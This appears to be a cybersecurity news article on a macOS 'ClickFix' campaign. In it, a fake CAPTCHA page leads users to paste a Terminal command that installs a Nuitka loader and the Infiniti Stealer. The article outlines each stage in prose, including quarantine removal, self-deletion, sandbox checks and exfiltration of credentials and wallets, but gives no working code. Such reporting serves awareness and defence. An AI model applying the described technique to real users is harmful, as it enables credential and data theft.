The infection chain includes a fake CAPTCHA page, a Bash script, a Nuitka loader, and the Python-based infostealer.
A new macOS-targeted cyberattack campaign is leveraging a deceptive fake CAPTCHA page to trick users into executing malicious commands, highlighting the growing sophistication of social engineering tactics in cross-platform threats. Security researchers have identified the attack as part of the evolving “ClickFix” technique, which has been widely used since 2024 but is now increasingly adapted to target Apple devices.
The attack begins with a fraudulent Cloudflare-style human verification page that appears legitimate and prompts users to complete a verification step. Instead of traditional CAPTCHA interaction, users are instructed to open the Terminal application and paste a command, creating a false sense of authenticity while bypassing typical browser-based security expectations.
Once executed, the command downloads a malicious Bash script from a remote server. The script decodes an embedded payload, writes a secondary binary into a temporary directory, removes macOS quarantine protections, and executes the file. It also injects command-and-control (C&C) server details and authentication tokens as environment variables before deleting itself and closing the Terminal, minimizing visible traces of the attack.
At the core of the infection chain is a loader compiled using Nuitka, a tool that converts Python code into native binaries. This technique significantly complicates static analysis and detection, enabling the malware to evade traditional security mechanisms. When executed, the loader decompresses hidden data and deploys the final payload – Infiniti Stealer.
Infiniti Stealer is a Python-based information-stealing malware designed to extract a wide range of sensitive data from compromised systems. Its targets include browser-stored credentials, macOS Keychain data, cryptocurrency wallets, developer-related secrets, and screenshots captured during the attack process.
The stolen data is transmitted to the attacker-controlled infrastructure via HTTP POST requests. Once exfiltration is complete, the malware sends notifications to a Telegram channel and queues the stolen credentials for further processing, including potential password cracking on remote servers.
To avoid detection, Infiniti Stealer incorporates multiple evasion techniques, including randomized execution delays and checks to determine whether it is running in a sandbox or analysis environment. These features help the malware remain undetected for longer periods and increase the likelihood of successful data exfiltration.
Researchers note that this campaign marks a significant shift in threat actor strategies, as techniques previously effective on Windows systems are now being refined for macOS environments. The use of compiled Python binaries and advanced social engineering methods suggests that attackers are investing in more sophisticated tooling to expand their reach.
As macOS continues to gain popularity in enterprise and developer environments, this evolution in attack techniques underscores the need for heightened user awareness and stronger endpoint security measures. The rise of ClickFix-based campaigns targeting Mac users signals a broader trend where no operating system is immune to increasingly adaptive cyber threats.
Recommended Cyber Technology News :
- F5 and Forcepoint Partner To Secure Enterprise AI
- Data Exfiltration Risks Found in Claude Vulnerabilities
- OpenClaw AI Agent Security Flaw Risks Data Exfiltration
To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com
